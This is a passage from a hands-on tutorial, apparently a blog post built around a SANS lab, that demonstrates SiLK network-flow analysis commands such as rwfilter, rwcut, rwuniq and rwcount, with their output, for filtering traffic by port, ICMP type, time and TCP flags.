7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=6 --dport=0-1023 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--start-date=2022/01/01 --end-date=2022/05/01 --pass=stdout --max-pass=1000 | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwuniq --fields dport --values flow,bytes,packets --sort</span></b></span>
<span style="color: white;">dPort| Records| Bytes| Packets|</span>
<span style="color: white;"> 21| 1| 156| 3|</span>
<span style="color: white;"> 22| 39| 248109713| 4847875|</span>
<span style="color: white;"> 25| 17| 1047287| 809|</span>
<span style="color: white;"> 80| 4| 6315| 104|</span>
<span style="color: white;"> 443| 939| 912196| 20670|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>More detail to understand the type of data and the sensor involved.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=6 --dport=0-1023 --start-date=2022/01/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--end-date=2022/05/01 --pass=stdout --max-pass=1000 | rwuniq \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--fields dport,type,sensor --values flow,bytes,packets --sort</span></b></span>
<span style="color: white;">dPort| type| sensor| Records| Bytes| Packets|</span>
<span style="color: white;"> 21| in| Internal| 1| 156| 3|</span>
<span style="color: white;"> 22| in| Internal| 33| 247919188| 4845368|</span>
<span style="color: white;"> 22| out| Internal| 6| 190525| 2507|</span>
<span style="color: white;"> 25| in| Internal| 17| 1047287| 809|</span>
<span style="color: white;"> 80| inweb| Internal| 4| 6315| 104|</span>
<span style="color: white;"> 443| inweb| Internal| 939| 912196| 20670|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><br /></div><div>I find it quite interesting, that the majority of this traffic is on port 22, typically associated with SSH.</div><div><br /></div><div>So far I've been specific about fields such as<i> --fields=sip</i>. How about grabbing all the fields with <b><i>rwcut</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ <b>rwcut --all-fields attack-trace.rw --num-recs=2</b></span>
<span style="color: white;"> sIP| dIP|sPort|dPort|pro| packets| bytes| flags| sTime| duration| eTime| sensor| in| out| nhIP|initialF|sessionF|attribut|appli|cla| type| sTime+msec| eTime+msec| dur+msec|iTy|iCo|</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111| 1821| 445| 6| 4| 168|FS A |2019/04/20T03:28:28.374| 0.354|2019/04/20T03:28:28.728| Internal| 0| 0| 0.0.0.0| S |F A | | 0|all| in|2019/04/20T03:28:28.374|2019/04/20T03:28:28.728| 0.354| | |</span>
<span style="color: white;"> 192.150.11.111| 98.114.205.102| 445| 1821| 6| 3| 128|FS A |2019/04/20T03:28:28.375| 0.353|2019/04/20T03:28:28.728| Internal| 0| 0| 0.0.0.0| S A |F A | | 0|all| in|2019/04/20T03:28:28.375|2019/04/20T03:28:28.728| 0.353| | |</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Revisit the timestamps via <b><i>rwcut</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut --fields stime attack-trace.rw --num-recs=5</span></b></span>
<span style="color: white;"> sTime|</span>
<span style="color: white;">2019/04/20T03:28:28.374|</span>
<span style="color: white;">2019/04/20T03:28:28.375|</span>
<span style="color: white;">2019/04/20T03:28:28.509|</span>
<span style="color: white;">2019/04/20T03:28:28.509|</span>
<span style="color: white;">2019/04/20T03:28:30.466|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use the legacy timestamp instead with <b><i>rwcut</i></b>, rather than the default.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut --fields stime attack-trace.rw --legacy-timestamp --num-recs=5</span></b></span>
<span style="color: white;"> sTime|</span>
<span style="color: white;">04/20/2019 03:28:28|</span>
<span style="color: white;">04/20/2019 03:28:28|</span>
<span style="color: white;">04/20/2019 03:28:28|</span>
<span style="color: white;">04/20/2019 03:28:28|</span>
<span style="color: white;">04/20/2019 03:28:30|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Or maybe get <b><i>rwcut </i></b>to produce the time in epoch time.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass=stdout --type=all --bytes=0-30 | rwuniq --bin-time=86400 --fields stime,type \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--values=records --sort-output --timestamp-format=epoch | head --lines=5</b></span>
<span style="color: white;"> sTime| type| Records|</span>
<span style="color: white;">1644624000| in| 4136|</span>
<span style="color: white;">1644624000| out| 52|</span>
<span style="color: white;">1644710400| in| 2469|</span>
<span style="color: white;">1644796800| in| 4307</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Revisit <b><i>rwcut </i></b>formatting.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut --fields stime,duration,sip,dport attack-trace.rw --num-recs=5</span></b></span>
<span style="color: white;"> sTime| duration| sIP|dPort|</span>
<span style="color: white;">2019/04/20T03:28:28.374| 0.354| 98.114.205.102| 445|</span>
<span style="color: white;">2019/04/20T03:28:28.375| 0.353| 192.150.11.111| 1821|</span>
<span style="color: white;">2019/04/20T03:28:28.509| 4.938| 98.114.205.102| 445|</span>
<span style="color: white;">2019/04/20T03:28:28.509| 4.938| 192.150.11.111| 1828|</span>
<span style="color: white;">2019/04/20T03:28:30.466| 3.100| 98.114.205.102| 1957|</span>
</pre></td></tr></tbody></table></div>
<br />Remove the columns, make it pipe delimited.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut --fields stime,duration,sip,dport attack-trace.rw --num-recs=5</span></b><span style="color: white;"> --no-columns</span></span>
<span style="color: white;">sTime|duration|sIP|dPort|</span>
<span style="color: white;">2019/04/20T03:28:28.374|0.354|98.114.205.102|445|</span>
<span style="color: white;">2019/04/20T03:28:28.375|0.353|192.150.11.111|1821|</span>
<span style="color: white;">2019/04/20T03:28:28.509|4.938|98.114.205.102|445|</span>
<span style="color: white;">2019/04/20T03:28:28.509|4.938|192.150.11.111|1828|</span>
<span style="color: white;">2019/04/20T03:28:30.466|3.100|98.114.205.102|1957|</span>
</pre></td></tr></tbody></table></div>
<br /> Revisit creating a file from <b><i>rwfilter</i></b>. This time, set the <i>--compression-method</i> to <i>none</i>.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=all --max-pass=100 --compression-method=none --pass=uncompressed.rw</b></span>
</pre></td></tr></tbody></table></div>
<br />Leveraging <i>rwfilter</i> compression when creating files. Set the <i>--compression-method </i>to <i>best</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--type=all --max-pass=100 --compression-method=best</span><span> </span><span>--pass=compressed.rw</span></span></b>
</pre></td></tr></tbody></table></div>
</div><div><br />Review the files to created by <b><i>rwfilter</i></b>, confirm the compression<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">ls *compressed* -l</span></b></span>
<span style="color: white;">-rw-rw-r-- 1 sans sans 1177 Jun 13 01:51 compressed.rw</span>
<span style="color: white;">-rw-rw-r-- 1 sans sans 8976 Jun 13 01:51 uncompressed.rw</span>
</pre></td></tr></tbody></table></div>
</div><div><br />Find echo replies by leveraging <b><i>rwfilter</i></b> <i>--icmp-type</i> and <i>--icmp-code </i>parameters. Specifically look at ICMP type 0 and code 0.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --icmp-type=0 --icmp-code=0 --type=all --max-pass=100000 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass-destination=stdout | rwcut --num-recs=4 --fields sip,dip,proto,packets,bytes --icmp-type-and-code</b></span>
<span style="color: white;"> sIP| dIP|pro| packets| bytes|sPort|dPort|</span>
<span style="color: white;"> fe80::250:56ff:fead:e8b6| ff02::2| 58| 1| 56| 0| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:445| ff02::2| 58| 1| 56| 0| 0|</span>
<span style="color: white;"> 66.35.60.78| 172.28.30.5| 1| 10| 920| 0| 0|</span>
<span style="color: white;"> 66.35.60.78| 172.28.30.2| 1| 15| 1380| 0| 0|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Note above in the <i>--fields</i> section, I do not have sport or dport. However, we see these values for the ICMP type and codes. Do note, ICMP does not use the concept of ports. Trick question I ask at interviews, "<i>What protocol and port does Ping use TCP or UDP?</i>" :-) </div><div><br /></div><div>Are there any echo requests to match those replies?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --icmp-type=8 --icmp-code=0 --type=all --max-pass=100000 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass-destination=stdout | rwcut --num-recs=4 --fields sip,dip,proto,packets,bytes --icmp-type-and-code</span></b></span>
<span style="color: white;"> sIP| dIP|pro| packets| bytes|sPort|dPort|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>That's interesting! No records returned for echo requests. How can that be?! Very interesting! Did I miss something? Leave me a note in the comment section.</div><div><br /></div><div>Looking at the <i><b>rwfilter </b>--print-</i><i>volume-statistics</i> to see if there are any clues as to why no packets were returned</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~$ </span><span style="color: #fcff01;"><b>rwfilter --start=2022/01/05 --end=2022/07/01T23 --icmp-type=8 --icmp-code=0 --type=all --max-pass=100000 --print-volume-statistics</b></span>
<span style="color: white;"> | Recs| Packets| Bytes| Files|</span>
<span style="color: white;">Total| 25713809| 688813257| 402383908447| 13064|</span>
<span style="color: white;"> Pass| 0| 0| 0| |</span>
<span style="color: white;"> Fail| 25713809| 688813257| 402383908447| |</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Going back further in time, just to see what the ICMP echo request output looks like.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2012/01/05 --end=2022/07/01T23 --icmp-type=8 --icmp-code=0 --type=all --max-pass=100000</span></b></span><b><span style="color: #fcff01;">
<span>--pass-destination=stdout | rwcut --num-recs=4 --fields sip,dip,proto,packets,bytes --icmp-type-and-code</span></span></b>
<span style="color: white;"> sIP| dIP|pro| packets| bytes|sPort|dPort|</span>
<span style="color: white;"> 192.168.2.166| 192.168.2.1| 1| 31| 2604| 8| 0|</span>
<span style="color: white;"> 192.168.2.166| 192.168.2.1| 1| 9| 756| 8| 0|</span>
<span style="color: white;"> 192.168.2.166| 192.168.2.1| 1| 10| 840| 8| 0|</span>
<span style="color: white;"> 192.168.2.166| 192.168.2.1| 1| 30| 2520| 8| 0|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>We now see four records of ICMP Type 8 and Code 0.</div><div><br /></div><div>Get the filenames via <i><b>rwfilter </b>--print-file-names</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--icmp-type=8 --icmp-code=0 --type=all --max-pass=100000 --print-volume-statistics \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--print-filenames | more</span></b></span>
<span style="color: white;">/data/in/2022/02/08/in-internal_20220208.14</span>
<span style="color: white;">/data/out/2022/02/08/out-internal_20220208.14</span>
<span style="color: white;">/data/inweb/2022/02/08/iw-internal_20220208.14</span>
<span style="color: white;">/data/ext2ext/2022/02/08/ext2ext-internal_20220208.14</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Find the missing files via <i><b>rwfilter </b>--print-missing-files</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --icmp-type=8 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--icmp-code=0 --type=all --max-pass=100000 --print-volume-statistics \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--print-missing-files | more</b></span>
<span style="color: white;">Missing /data/out/2022/01/20/out-Internal_20220120.13</span>
<span style="color: white;">Missing /data/out/2022/01/20/out-Perimeter_20220120.13</span>
<span style="color: white;">Missing /data/out/2022/01/20/out-ERS_20220120.13</span>
<span style="color: white;">Missing /data/out/2022/01/20/out-internal_20220120.13</span>
<span style="color: white;">Missing /data/inweb/2022/01/20/iw-Internal_20220120.13</span>
<span style="color: white;">Missing /data/inweb/2022/01/20/iw-Perimeter_20220120.13</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div>Leveraging <b><i>rwfglob</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ <b>rwfglob --start-date=2012/01/01 --end-date=2022/07/01 \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><b>--no-file-names</b></span>
<span style="color: white;">globbed 24574 files; 0 on tape</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Revisiting <b><i>rwcount</i></b> bin sizes from the time perspective. Below shows the time is at 30 minutes interval. This seems to be the default <i>--bin-size.</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=all --max-pass=5 --pass-destination=stdout | rwcount</b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2022/02/08T15:28:30| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:29:00| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:29:30| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:30:00| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:30:30| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:31:00| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:31:30| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:32:00| 0.00| 0.00| 0.00|</span>
<span style="color: white;">2022/02/08T15:32:30| 3.00| 19170.00| 15.00|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Adjusting the <i><b>rwcount </b>--bin-size</i> by using terminal to do arithmetic. Changing the --bin-size to two minutes interval.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=all --max-pass=5 --pass-destination=stdout | rwcount --bin-size=$((2*60))</b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2022/02/08T15:28:00| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:30:00| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:32:00| 3.00| 19170.00| 15.00|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Changing the <i>--bin-size</i> to 5 minutes interval.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=all --max-pass=5 --pass-destination=stdout | rwcount --bin-size=$((5*60))</b></span>
<span style="color: white;"> Date| Records| Bytes| Packets|</span>
<span style="color: white;">2022/02/08T15:25:00| 1.00| 6390.00| 5.00|</span>
<span style="color: white;">2022/02/08T15:30:00| 4.00| 25560.00| 20.00|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Using the time as a range via <i><b>rwfilter </b>--stime.</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --stime=2022/02/09T16:00:00-2022/02/09T16:02:00 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--type=all --pass-destination=stdout --protocol=0- | rwcut --fields=stime,sip,dip</span></b></span>
<span style="color: white;"> sTime| sIP| dIP|</span>
<span style="color: white;">2022/02/09T16:00:19.850| 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;">2022/02/09T16:00:35.377| 17.253.26.125| 172.28.10.137|</span>
<span style="color: white;">2022/02/09T16:01:29.106| 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;">2022/02/09T16:01:29.817| 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;">2022/02/09T16:00:19.850| 172.28.10.137| 8.8.8.8|</span>
<span style="color: white;">2022/02/09T16:00:35.377| 172.28.10.137| 17.253.26.125|</span>
<span style="color: white;">2022/02/09T16:01:29.106| 172.28.10.137| 8.8.8.8|</span>
<span style="color: white;">2022/02/09T16:01:29.817| 172.28.10.137| 8.8.8.8|</span>
<span style="color: white;">2022/02/09T16:01:29.214| 52.109.20.75| 172.28.30.4|</span>
<span style="color: white;">2022/02/09T16:01:29.892| 52.109.8.20| 172.28.30.4|</span>
<span style="color: white;">2022/02/09T16:01:29.892| 52.109.8.20| 172.28.30.4|</span>
<span style="color: white;">2022/02/09T16:00:19.852| 72.21.81.240| 172.28.10.25|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Find completed flows, by looking at the <i>SYN</i>, <i>ACK</i>, <i>FIN </i>and <i>RST</i> flags. Note the <i>--flags-all=SAF/SAF,SAR/SAR</i> parameters for <b><i>rwfilter</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --type=all --pass-destination=stdout --protocol=6 --flags-all=SAF/SAF,SAR/SAR | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwcut --fields=stime,sip,dip,flags --num-recs=5</b></span>
<span style="color: white;"> sTime| sIP| dIP| flags|</span>
<span style="color: white;">2022/02/09T16:00:19.852| 72.21.81.240| 172.28.10.25|FS PA |</span>
<span style="color: white;">2022/02/09T16:05:25.018| 52.167.17.97| 172.28.30.5|FS PA |</span>
<span style="color: white;">2022/02/09T16:02:31.816| 52.167.249.196| 172.28.10.89|FS PA E |</span>
<span style="color: white;">2022/02/09T16:02:39.571| 142.250.72.10| 172.28.30.5|FS PA |</span>
<span style="color: white;">2022/02/09T16:03:15.843| 142.250.72.35| 172.28.50.2|FS PA |</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Print <b><i>rwcut</i></b> TCP flags as integers via <i>--integer-tcp-flags</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --type=all --pass-destination=stdout --protocol=6 --flags-all=SAF/SAF,SAR/SAR | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwcut --fields=stime,sip,dip,flags --num-recs=5 --integer-tcp-flags</b></span>
<span style="color: white;"> sTime| sIP| dIP|fla|</span>
<span style="color: white;">2022/02/09T16:00:19.852| 72.21.81.240| 172.28.10.25| 27|</span>
<span style="color: white;">2022/02/09T16:05:25.018| 52.167.17.97| 172.28.30.5| 27|</span>
<span style="color: white;">2022/02/09T16:02:31.816| 52.167.249.196| 172.28.10.89| 91|</span>
<span style="color: white;">2022/02/09T16:02:39.571| 142.250.72.10| 172.28.30.5| 27|</span>
<span style="color: white;">2022/02/09T16:03:15.843| 142.250.72.35| 172.28.50.2| 27|</span>
</pre></td></tr></tbody></table></div>
